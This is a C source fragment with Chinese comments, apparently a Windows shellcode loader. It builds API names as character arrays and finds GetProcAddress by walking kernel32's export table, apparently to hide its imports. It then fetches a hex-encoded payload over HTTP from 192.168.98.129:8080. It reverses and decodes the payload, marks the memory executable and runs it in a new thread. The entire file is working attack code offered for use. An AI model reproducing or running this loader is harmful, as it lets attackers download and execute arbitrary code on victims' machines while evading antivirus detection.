57 | typedef LPVOID(WINAPI* Fn_InternetOpenA)( LPCSTR lpszAgent, DWORD dwAccessType, LPCSTR lpszProxy, LPCSTR lpszProxyBypass,DWORD dwFlags);
58 | typedef LPVOID(WINAPI* Fn_InternetConnectA)( LPVOID hInternet, LPCSTR lpszServerName, WORD nServerPort, LPCSTR lpszUserName,LPCSTR lpszPassword,DWORD dwService,DWORD dwFlags, DWORD_PTR dwContext);
59 | typedef LPVOID(WINAPI* Fn_HttpOpenRequestA)( LPVOID hConnect, LPCSTR lpszVerb,LPCSTR lpszObjectName, LPCSTR lpszVersion,LPCSTR lpszReferrer,LPCSTR * lplpszAcceptTypes,DWORD dwFlags, DWORD_PTR dwContext);
60 | typedef BOOL(WINAPI* Fn_HttpSendRequestW)( LPVOID hRequest, LPCWSTR lpszHeaders,DWORD dwHeadersLength,LPVOID lpOptional,DWORD dwOptionalLength);
61 | typedef BOOL(WINAPI* Fn_InternetReadFile)( LPVOID hFile, LPVOID lpBuffer, DWORD dwNumberOfBytesToRead, LPDWORD lpdwNumberOfBytesRead);
62 | typedef BOOL(WINAPI* Fn_InternetCloseHandle)( LPVOID hInternet);
63 | typedef BOOL(WINAPI* Fn_VirtualFree)(LPVOID lpAddress,SIZE_T dwSize,DWORD dwFreeType);
64 | typedef HANDLE(WINAPI* Fn_CreateThread)(LPSECURITY_ATTRIBUTES lpThreadAttributes,SIZE_T dwStackSize,LPTHREAD_START_ROUTINE lpStartAddress,LPVOID lpParameter,DWORD dwCreationFlags,LPDWORD lpThreadId);
65 | typedef NTSTATUS (WINAPI* Fn_RtlCharToInteger)(const char *String ,ULONG Base,PULONG Value);
66 |
67 |
68 | FN_GetProcAddress fn_GetProcAddress;
69 | FN_LoadLibraryA fn_LoadLibraryA;
70 | FM_VirtualAlloc fn_VirtualAlloc;
71 | FM_VirtualProtect fn_VirtualProtect;
72 | Fn_CreateThread fn_CreateThread;
73 | Fn_InternetOpenA fn_InternetOpenA;
74 | Fn_InternetConnectA fn_InternetConnectA;
75 | Fn_HttpOpenRequestA fn_HttpOpenRequestA;
76 | Fn_HttpSendRequestW fn_HttpSendRequestW;
77 | Fn_InternetReadFile fn_InternetReadFile;
78 | Fn_InternetCloseHandle fn_InternetCloseHandle;
79 | Fn_RtlCharToInteger fn_RtlCharToInteger;
80 | Fn_VirtualFree fn_VirtualFree;
81 |
82 | char xyLoadLibraryA[] = { 'L','o','a','d','L','i','b','r','a','r','y','A',0 };
83 | char xy_Virtualalloc[] = { 'V','i','r','t','u','a','l','A','l','l','o','c',0 };
84 | char xy_VirtualProtectC[] = { 'V','i','r','t','u','a','l','P','r','o','t','e','c','t',0 };
85 | char xy_CreateThread[] = { 'C','r','e','a','t','e','T','h','r','e','a','d',0 };
86 | char xy_Wininet[] = { 'W','i','n','i','n','e','t','.','d','l','l',0 };
87 | char xy_InternetOpenA[] = { 'I','n','t','e','r','n','e','t','O','p','e','n','A',0 };
88 | char xy_HttpSendRequestW[] = { 'H','t','t','p','S','e','n','d','R','e','q','u','e','s','t','W',0 };
89 | char xy_InternetReadFile[] = { 'I','n','t','e','r','n','e','t','R','e','a','d','F','i','l','e',0 };
90 | char xy_InternetConnectA[] = { 'I','n','t','e','r','n','e','t','C','o','n','n','e','c','t','A',0 };
91 | char xy_HttpOpenRequestA[] = { 'H','t','t','p','O','p','e','n','R','e','q','u','e','s','t','A',0 };
92 | char xy_InternetCloseHandle[] = { 'I','n','t','e','r','n','e','t','C','l','o','s','e','H','a','n','d','l','e',0 };
93 | char xy_strtol[] = { 'R','t','l','C','h','a','r','T','o','I','n','t','e','g','e','r',0}; //RtlCharToInteger
94 | char xy_VirtualFree[] = {'V','i','r','t','u','a','l','F','r','e','e',0};
95 | char xy_ntdll[] = { 'n','t','d','l','l','.','d','l','l',0 };
96 |
97 | fn_GetProcAddress = (FN_GetProcAddress)getProcAddress((HMODULE)getKernel32());
98 | fn_LoadLibraryA = (FN_LoadLibraryA)fn_GetProcAddress((HMODULE)getKernel32(), xyLoadLibraryA);
99 | fn_RtlCharToInteger = (Fn_RtlCharToInteger)fn_GetProcAddress(fn_LoadLibraryA(xy_ntdll), xy_strtol);
100 | HANDLE hd = fn_LoadLibraryA(xy_Wininet);
101 | fn_VirtualAlloc = (FM_VirtualAlloc)fn_GetProcAddress((HMODULE)getKernel32(), xy_Virtualalloc);
102 | fn_VirtualProtect = (FM_VirtualProtect)fn_GetProcAddress((HMODULE)getKernel32(), xy_VirtualProtectC);
103 | fn_CreateThread = (Fn_CreateThread)fn_GetProcAddress((HMODULE)getKernel32(), xy_CreateThread);
104 | fn_VirtualFree = (Fn_VirtualFree)fn_GetProcAddress((HMODULE)getKernel32(), xy_VirtualFree);
105 | fn_InternetOpenA = (Fn_InternetOpenA)fn_GetProcAddress(fn_LoadLibraryA((LPCSTR)xy_Wininet), xy_InternetOpenA);
106 | fn_HttpSendRequestW = (Fn_HttpSendRequestW)fn_GetProcAddress(fn_LoadLibraryA((LPCSTR)xy_Wininet), xy_HttpSendRequestW);
107 | fn_InternetReadFile = (Fn_InternetReadFile)fn_GetProcAddress(fn_LoadLibraryA((LPCSTR)xy_Wininet), xy_InternetReadFile);
108 | fn_InternetConnectA = (Fn_InternetConnectA)fn_GetProcAddress(fn_LoadLibraryA((LPCSTR)xy_Wininet), xy_InternetConnectA);
109 | fn_HttpOpenRequestA = (Fn_HttpOpenRequestA)fn_GetProcAddress(fn_LoadLibraryA((LPCSTR)xy_Wininet), xy_HttpOpenRequestA);
110 | fn_InternetCloseHandle = (Fn_InternetCloseHandle)fn_GetProcAddress(fn_LoadLibraryA((LPCSTR)xy_Wininet), xy_InternetCloseHandle);
111 |
112 | if (fn_InternetCloseHandle)
113 | {
114 | printf("%p\r\n", fn_InternetCloseHandle);
115 | }
116 |
117 | DWORD BUFFER_SIZE = 0x1000000; //我无法确定shellcode的大小,所以我尽可能开辟一个足够大的空间
118 | char UA[] = { 'M','o','z', 'i', 'l', 'l', 'a', '/', '5', '.', '0', '(', 'W', 'i', 'n', 'd', 'o', 'w', 's', ' ', 'N', 'T', '1', '0', '.', '0', ';', ' ', 'W', 'i', 'n', '6', '4',';',' ','x','6','4',')',' ',0 };
119 | char http[] = { 'H','T','T','P','/','1','.','0',0 };
120 |
121 | DWORD wrt;
122 | char IP[] = { '1','9','2','.','1','6','8','.','9','8','.','1','2','9',0 };
123 | char file[] = { 't','e','s','t','.','t','x','t',0 };
124 |
125 | //初始化
126 | LPVOID Readbuffer = 0;
127 | LPVOID hInternet = fn_InternetOpenA(UA, 1, NULL, NULL, 0);
128 | //链接
129 | DWORD_PTR dwContext = 0;
130 | LPVOID hConnect = fn_InternetConnectA(hInternet, IP, 8080, NULL, NULL, 3, 0x10000000, dwContext);
131 | //使用Get
132 | LPVOID hRequest = fn_HttpOpenRequestA(hConnect, NULL, file, http, NULL, NULL, 0x4C8200, 0);
133 |
134 | if (fn_HttpSendRequestW(hRequest, NULL, 0, NULL, 0))
135 | {
136 | Readbuffer = fn_VirtualAlloc(0, BUFFER_SIZE, MEM_COMMIT, PAGE_READWRITE);
137 | DWORD Buffer_Count = 0;
138 | while (fn_InternetReadFile(hRequest, (LPVOID)((DWORD)Readbuffer + Buffer_Count), 0x2000, &wrt))
139 | {
140 | Buffer_Count += 0x2000;
141 | if (wrt == 0)
142 | {
143 | break;
144 | }
145 | }
146 | fn_InternetCloseHandle(hInternet);
147 | fn_InternetCloseHandle(hConnect);
148 | fn_InternetCloseHandle(hRequest);
149 | }
150 |
151 | const char* hex = (char *)Readbuffer;
152 |
153 | DWORD StrSize = my_strlen(hex);
154 | DWORD MemSize = StrSize / 2;
155 |
156 | PVOID numbuf = fn_VirtualAlloc(NULL, StrSize, MEM_COMMIT, PAGE_READWRITE);
157 | char* Resstr = (char *)fn_VirtualAlloc(NULL, StrSize, MEM_COMMIT, PAGE_READWRITE);
158 | WORD* tmp = (WORD*)fn_VirtualAlloc(NULL,sizeof(WORD*),MEM_COMMIT,PAGE_READWRITE);
159 | PVOID buffer = fn_VirtualAlloc(NULL, StrSize, MEM_COMMIT, PAGE_READWRITE);
160 |
161 | ULONGLONG BufferCount = 0;
162 | BYTE num = 0;
163 | DWORD p = 0;
164 |
165 | //倒置
166 | for (int i = StrSize - 1; i >= 0; i--)
167 | {
168 | Resstr[p++] = hex[i];
169 | }
170 |
171 | //sscanf
172 | for (int i = 0; i < StrSize; i += 2)
173 | {
174 | *tmp = *(WORD*)(Resstr + i);
175 | fn_RtlCharToInteger((const char*)tmp, 16, (PULONG)numbuf); // number base 16
176 | num = *(BYTE*)numbuf;
177 | *tmp = (BYTE)num;
178 | *((char*)(ULONGLONG)buffer + BufferCount) = *tmp; //这里如果自己实现一个标准的memcpy,因为字符串长度比较大,所以效率会比较低,所以我选择直接操作指针。
179 | //my_memcpy((PVOID)((ULONGLONG)buffer + BufferCount), tmp, 1);
180 | BufferCount++;
181 | }
182 | fn_VirtualFree(Readbuffer,0, MEM_RELEASE);
183 | fn_VirtualFree(numbuf, 0, MEM_RELEASE);
184 | fn_VirtualFree(tmp, 0, MEM_RELEASE);
185 |
186 | DWORD Oldprotect = 0;
187 | fn_VirtualProtect(buffer, MemSize, PAGE_EXECUTE_READWRITE, &Oldprotect);
188 | HANDLE thba = fn_CreateThread(0, 0, (LPTHREAD_START_ROUTINE)buffer, 0, 0, 0);
189 | WaitForSingleObject(thba, -1);
190 | return 0;
191 |
192 | }
193 |
194 | FARPROC getProcAddress(HMODULE hModuleBase)
195 | {
196 | PIMAGE_DOS_HEADER lpDosHeader = (PIMAGE_DOS_HEADER)hModuleBase;
197 | PIMAGE_NT_HEADERS64 lpNtHeader = (PIMAGE_NT_HEADERS64)((ULONG64)hModuleBase + lpDosHeader->e_lfanew);
198 | if (!lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size) {
199 | return NULL;
200 | }
201 | if (!lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress) {
202 | return NULL;
203 | }
204 | PIMAGE_EXPORT_DIRECTORY lpExports = (PIMAGE_EXPORT_DIRECTORY)((ULONG64)hModuleBase + (ULONG64)lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
205 | PDWORD lpdwFunName = (PDWORD)((ULONG64)hModuleBase + (ULONG64)lpExports->AddressOfNames);
206 | PWORD lpword = (PWORD)((ULONG64)hModuleBase + (ULONG64)lpExports->AddressOfNameOrdinals);
207 | PDWORD lpdwFunAddr = (PDWORD)((ULONG64)hModuleBase + (ULONG64)lpExports->AddressOfFunctions);
208 |
209 | DWORD dwLoop = 0;
210 | FARPROC pRet = NULL;
211 | for (; dwLoop <= lpExports->NumberOfNames - 1; dwLoop++) {
212 | char* pFunName = (char*)(lpdwFunName[dwLoop] + (ULONG64)hModuleBase);
213 |
214 | if (pFunName[0] == 'G' &&
215 | pFunName[1] == 'e' &&
216 | pFunName[2] == 't' &&
217 | pFunName[3] == 'P' &&
218 | pFunName[4] == 'r' &&
219 | pFunName[5] == 'o' &&
220 | pFunName[6] == 'c' &&
221 | pFunName[7] == 'A' &&
222 | pFunName[8] == 'd' &&
223 | pFunName[9] == 'd' &&
224 | pFunName[10] == 'r' &&
225 | pFunName[11] == 'e' &&
226 | pFunName[12] == 's' &&
227 | pFunName[13] == 's')
228 | {
229 | pRet = (FARPROC)(lpdwFunAddr[lpword[dwLoop]] + (ULONG64)hModuleBase);
230 | break;
231 | }
232 | }
233 | return pRet;
234 | }
235 |
236 |
237 |
--------------------------------------------------------------------------------